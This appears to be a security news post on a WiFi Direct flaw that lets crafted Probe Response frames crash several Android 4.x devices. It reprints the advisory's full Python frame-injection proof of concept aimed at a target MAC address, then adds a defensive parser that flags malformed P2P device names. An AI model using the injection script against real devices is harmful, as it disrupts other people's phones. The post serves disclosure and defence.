Some Android Devices Vulnerable to DoS via a WiFi Direct Vulnerability


Several Android devices are vulnerable to a denial of service caused by a WiFi Direct vulnerability discovered by Andres Blanco of CoreLabs.

An attacker could send a specially crafted 802.11 Probe Response frame, causing the Dalvik subsystem to reboot because of an unhandled exception in the WifiMonitor class.

Vulnerable packages include:

- Nexus 5 – Android 4.4.4
- Nexus 4 – Android 4.4.4
- LG D806 – Android 4.2.2
- Samsung SM-T310 – Android 4.2.2
- Motorola RAZR HD – Android 4.1.2

Core Security disclosed the vulnerability on Seclists. The bug is in the modified wpa_supplicant that Android uses to provide the interface between the wireless driver and the Android platform framework.

If an attacker's frame makes wpa_supplicant emit a malformed event string, Android's WifiP2pDevice class throws an IllegalArgumentException, crashing the device: “a device name attribute with specific bytes generates a malformed supplicant event string that ends up throwing the IllegalArgumentException”.

Here is the PoC from the Seclists advisory:

This PoC was implemented using the open source library Lorcon [2] and PyLorcon2 [3], a Python wrapper for the Lorcon library.

/-----
    #!/usr/bin/env python
    # Python 2 PoC from the advisory; PyLorcon2 is a Python 2 binding for Lorcon.

    import sys
    import time
    import struct
    import PyLorcon2


    def get_probe_response(source, destination, channel):
        frame = str()
        frame += "\x50\x00"  # Frame Control (management frame, Probe Response)
        frame += "\x00\x00"  # Duration
        frame += destination
        frame += source
        frame += source
        frame += "\x00\x00"  # Sequence Control
        frame += "\x00\x00\x00\x00\x00\x00\x00\x00"  # Timestamp
        frame += "\x64\x00"  # Beacon Interval
        frame += "\x30\x04"  # Capabilities Information

        # SSID IE
        frame += "\x00"
        frame += "\x07"
        frame += "DIRECT-"

        # Supported Rates
        frame += "\x01"
        frame += "\x08"
        frame += "\x8C\x12\x98\x24\xB0\x48\x60\x6C"

        # DS Parameter Set
        frame += "\x03"
        frame += "\x01"
        frame += struct.pack("B", channel)

        # P2P (vendor-specific IE, Wi-Fi Alliance OUI 50:6F:9A, type 9)
        frame += "\xDD"
        frame += "\x27"
        frame += "\x50\x6F\x9A"
        frame += "\x09"
        # P2P Capabilities
        frame += "\x02"  # ID
        frame += "\x02\x00"  # Length
        frame += "\x21\x00"
        # P2P Device Info
        frame += "\x0D"  # ID
        frame += "\x1B\x00"  # Length
        frame += source
        frame += "\x01\x88"  # Config Methods
        frame += "\x00\x0A\x00\x50\xF2\x04\x00\x05"  # Primary Device Type
        frame += "\x00"  # Number of Secondary Device Types
        frame += "\x10\x11"  # WPS Device Name attribute
        frame += "\x00\x06"  # Length
        frame += "fafa\xFA\xFA"  # the device name bytes that produce the malformed event

        return frame


    def str_to_mac(address):
        # "00:11:22:33:44:55" -> 6 raw bytes
        return "".join(map(lambda i: chr(int(i, 16)), address.split(":")))


    if __name__ == "__main__":
        if len(sys.argv) != 3:
            print "Usage:"
            print "  poc.py <iface> <destination_mac>"
            print "Example:"
            print "  poc.py wlan0 00:11:22:33:44:55"
            sys.exit(-1)

        iface = sys.argv[1]
        destination = str_to_mac(sys.argv[2])

        context = PyLorcon2.Context(iface)
        context.open_injmon()

        channel = 1
        source = str_to_mac("00:11:22:33:44:55")
        frame = get_probe_response(source, destination, channel)

        print "Injecting PoC."
        for i in range(100):
            context.send_bytes(frame)
            time.sleep(0.100)
-----/
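For the defender's side of the same frame, here is an added Python 3 example (not from the advisory or this post) that parses a probe response, walks the vendor-specific P2P IE down to the WPS Device Name attribute with length-checked TLV parsing, and flags device names that are not clean UTF-8, the kind of bytes the PoC above carries. The sample frame is constructed here to match the PoC's layout; the function and constant names are this example's own.

```python
import struct

P2P_OUI_TYPE = b"\x50\x6f\x9a\x09"  # Wi-Fi Alliance OUI + P2P OUI type
ATTR_DEVICE_INFO = 0x0D             # P2P Device Info attribute id
WPS_DEVICE_NAME = 0x1011            # WPS Device Name TLV type

def parse_tlvs(data, fmt):
    """Yield (id, value) for consecutive TLVs; fmt is the struct format of the
    (id, length) header: "BB" for 802.11 IEs, "<BH" for P2P, ">HH" for WPS."""
    hdr, i = struct.calcsize(fmt), 0
    while i + hdr <= len(data):
        tid, length = struct.unpack_from(fmt, data, i)
        value = data[i + hdr:i + hdr + length]
        if len(value) != length:  # declared length runs past the buffer
            raise ValueError("truncated element 0x%x" % tid)
        yield tid, value
        i += hdr + length

def p2p_device_name(frame):
    """Return the P2P device name bytes from a probe response, or None."""
    body = frame[24 + 12:]  # 24-byte MAC header, then 12 bytes of fixed fields
    for eid, ie in parse_tlvs(body, "BB"):
        if eid != 0xDD or not ie.startswith(P2P_OUI_TYPE):
            continue  # not the vendor-specific P2P IE
        for aid, attr in parse_tlvs(ie[4:], "<BH"):
            if aid != ATTR_DEVICE_INFO or len(attr) < 17:
                continue
            # addr(6) + config methods(2) + primary type(8) + count(1),
            # then count * 8 bytes of secondary types, then WPS TLVs
            for tid, value in parse_tlvs(attr[17 + 8 * attr[16]:], ">HH"):
                if tid == WPS_DEVICE_NAME:
                    return value
    return None

def device_name_is_clean(name):
    """True only if the name is valid UTF-8 and printable."""
    try:
        return name.decode("utf-8").isprintable()
    except UnicodeDecodeError:
        return False

# Constructed sample laid out like the PoC frame; the 6-byte name "fafa" + 0xFA 0xFA is not UTF-8
MAC = bytes.fromhex("001122334455")
SAMPLE_FRAME = (
    bytes.fromhex("5000 0000") + MAC * 3 + bytes.fromhex("0000")
    + bytes(8) + bytes.fromhex("6400 3004")
    + b"\x00\x07DIRECT-" + bytes.fromhex("0108 8c129824b048606c 0301 01")
    + bytes.fromhex("dd27 506f9a09 02 0200 2100 0d 1b00") + MAC
    + bytes.fromhex("0188 000a0050f2040005 00 1011 0006") + b"fafa\xfa\xfa"
)
```

Running `device_name_is_clean(p2p_device_name(SAMPLE_FRAME))` on the sample returns False, while a normal name such as b"p2p-TEST2" passes; a frame whose declared lengths overrun the buffer raises ValueError instead of being parsed.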